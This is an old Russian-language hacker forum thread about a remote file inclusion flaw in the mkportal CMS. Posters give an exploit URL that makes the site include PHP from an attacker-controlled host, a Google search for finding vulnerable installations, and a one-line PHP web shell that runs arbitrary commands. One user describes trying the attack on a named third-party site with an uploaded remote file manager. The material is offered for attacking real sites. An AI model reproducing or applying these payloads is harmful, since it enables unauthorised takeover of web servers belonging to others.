Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Дыра в cms "mkportal" v1.0.1 (https://forum.antichat.xyz/showthread.php?t=2309)

zFailure 21.07.2004 00:39

внимание! в 1.0.1а это уже исправили

файл http://[target]/mkportal/include/driverf.php содержит
что-то вроде
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">require $MK_PATH."/conf_global.php";[/QUOTE]<span id='postcolor'>

эксплойт:
http://[target]/mkporta....TH=http

где:
http://[hacker_site]/conf_global.php
любой php код

http://www.google.ru/search?....%BA&lr=

Че Гевара 21.07.2004 00:50

пхп-шная инъекция ?
Довольно частый случай:
http://www.site.ru/index.php&amp;se=сайт_с_кодом&amp;cmd=К оманды

Че Гевара 21.07.2004 00:55

Хотелось бы добавить, что &quot;сайтом с кодом&quot; может являться любой сайт на народе со страничкой следующего содержания:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<PRE>
<H4>
<? system($cmd); ?>
</H4>
</PRE>
[/QUOTE]<span id='postcolor'>
Н-р: http://www.shutnicok.narod.ru/xak.php

zFailure 21.07.2004 01:11

кстати как видно из запроса в google
этот движок неплохо распостранился


интересно сколько на народе вот таких сайтов с загадочными файлами *.php =)

PhreakeR 11.10.2004 19:06

Блин, пишет вот что:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Fatal error: main(): Failed opening required 'http://hack-user.narod.ru/conf_global.php' (include_path='.:') in /membri/galassia/mkportal/include/driverf.php on line 20[/QUOTE]<span id='postcolor'>

PhreakeR 11.10.2004 19:16

А запрос делаю такой:
http://galassia.altervista.org/mkporta....TH=http

PhreakeR 11.10.2004 19:28

и ещё я загрузил remview на narod и переименовал в conf_global.php


Время: 20:58